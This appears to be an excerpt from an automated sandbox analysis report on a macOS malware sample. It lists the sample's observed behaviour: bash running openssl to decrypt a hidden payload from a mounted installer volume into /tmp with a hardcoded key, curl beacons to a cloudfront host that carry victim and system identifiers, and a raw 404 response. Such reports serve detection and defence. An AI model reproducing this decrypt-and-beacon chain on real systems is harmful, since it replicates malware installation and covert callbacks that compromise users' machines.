Source: /bin/bash (PID: 18843) | Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ | Jump to behavior |
Source: /bin/bash (PID: 18849) | Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2 | Jump to behavior |
Source: /bin/bash (PID: 18843) | Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ | Jump to behavior |
Source: /bin/bash (PID: 18849) | Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2 | Jump to behavior |
Source: global traffic | HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1 HTTP/1.0Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: */* |
Source: unknown | DNS traffic detected: queries for: d1wkiebwu8q7qk.cloudfront.net |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1245Connection: closeCache-Control: no-cache, no-storePragma: no-cacheExpires: -1Server: Microsoft-IIS/7.5Access-Control-Allow-Origin: *X-AspNet-Version: 4.0.30319p3p: CP="CAO PSA OUR"Date: Thu, 14 May 2020 09:21:12 GMTX-Cache: Error from cloudfrontVia: 1.1 6c9a2d99a25484f38efa27d58a726b2d.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA2-C2X-Amz-Cf-Id: QTqhiTeBI0MnpH6TE-ieuK0urxyObER7GaCgBzr4TxQ9ixi25rXZbg==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 |